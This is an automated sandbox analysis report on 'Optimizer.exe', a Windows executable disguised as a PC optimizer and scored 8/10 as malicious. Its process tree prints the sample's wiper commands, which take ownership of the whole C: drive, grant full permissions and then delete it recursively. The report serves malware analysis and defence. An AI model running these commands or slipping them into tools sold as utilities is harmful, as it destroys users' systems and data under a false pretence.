Overview

overview

8

Static

static

5

Optimizer.exe

windows11-21h2-x64

8

Analysis

  • max time kernel
    150s
  • max time network
    93s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    27-11-2024 08:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Optimizer.exe

  • Size

    159KB

  • MD5

    a5eb0d1b79f64f7ace12d65e26a6d4f3

  • SHA1

    b0386cb68d3b771687b5e4ac9d133db9a8d201f0

  • SHA256

    94b05cc89c01e748e28bfe6b0484f27af6b0fb3814cdf8b5995c4138c3779eff

  • SHA512

    7fd40a59517c7702ea13ecf1eea8f6779f691337837619841b27ffcf396ea69751429ea2cf607f451cd0712ae708d91e1953e0132c6c3603fc4382f766d880ac

  • SSDEEP

    3072:MwavFbFSymUJlum6XhJTeiWswHQVcScs7e3/0omHPOTvYFZloH8:MnvFbFfV7udxteiWpQVcEe3MAvYFZloc

Score
8/10
discoveryexploitspywarestealerupx

Malware Config

Signatures

  • Drops file in Drivers directory 64 IoCs
  • Manipulates Digital Signatures 4 IoCs

    Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.

  • Possible privilege escalation attempt 2 IoCs
    exploit
  • Modifies file permissions 1 TTPs 2 IoCs
    discovery
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Drops desktop.ini file(s) 33 IoCs
  • Drops autorun.inf file 1 TTPs 1 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 64 IoCs
  • Modifies termsrv.dll 1 TTPs 1 IoCs

    Commonly used to allow simultaneous RDP sessions.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Optimizer.exe
    "C:\Users\Admin\AppData\Local\Temp\Optimizer.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1716
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c chcp 65001 && cls && title PC FUCKER OPTIMIZER && color 0B && mode 145,30
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3524
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:5028
        • C:\Windows\system32\mode.com
          mode 145,30
          3⤵
            PID:3496
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c start /B takeown /f C:\ /r /d y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2068
          • C:\Windows\system32\takeown.exe
            takeown /f C:\ /r /d y
            3⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:2528
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c start /B icacls C:\ /grant administrators:F /t
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3340
          • C:\Windows\system32\icacls.exe
            icacls C:\ /grant administrators:F /t
            3⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:3084
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c start /B cmd /c rd /s /q C:\
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:420
          • C:\Windows\system32\cmd.exe
            cmd /c rd /s /q C:\
            3⤵
            • Drops file in Drivers directory
            • Manipulates Digital Signatures
            • Drops desktop.ini file(s)
            • Drops autorun.inf file
            • Drops file in System32 directory
            • Modifies termsrv.dll
            • Drops file in Program Files directory
            • Drops file in Windows directory
            PID:4396

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1716-0-0x00007FF69AF40000-0x00007FF69AF9A000-memory.dmp

        Filesize

        360KB

        Download

      • memory/1716-2-0x00007FF69AF40000-0x00007FF69AF9A000-memory.dmp

        Filesize

        360KB

        Download